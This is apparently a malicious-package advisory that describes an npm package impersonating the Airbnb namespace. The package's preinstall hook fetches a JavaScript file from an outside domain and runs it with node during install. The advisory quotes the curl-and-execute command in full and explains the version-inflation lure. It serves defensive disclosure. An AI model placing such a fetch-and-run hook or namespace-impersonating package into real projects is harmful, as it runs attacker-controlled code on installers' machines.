MAL-2026-6293

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (034fd98a2ccd98f2bec2201d130c5a102ad17907c37af34b5162592e26a0fd43) The package's preinstall lifecycle hook in package.json runs `curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js`, fetching an unpinned JavaScript file from poc.amanrawat.com and immediately executing it with node during `npm install`. The fetched content is mutable and entirely controlled by the operator of that domain — installers run whatever bytes are served at install time, with no hash or signature verification. The package ships no other functional content; the remote fetch-and-execute is its only behavior. The package name uses the 'airbnb-' prefix to impersonate the Airbnb open-source namespace while being published by an unrelated author with a placeholder description ('Test') and an inflated version (99.0.0), consistent with namespace impersonation intended to lure installers searching for Airbnb tooling.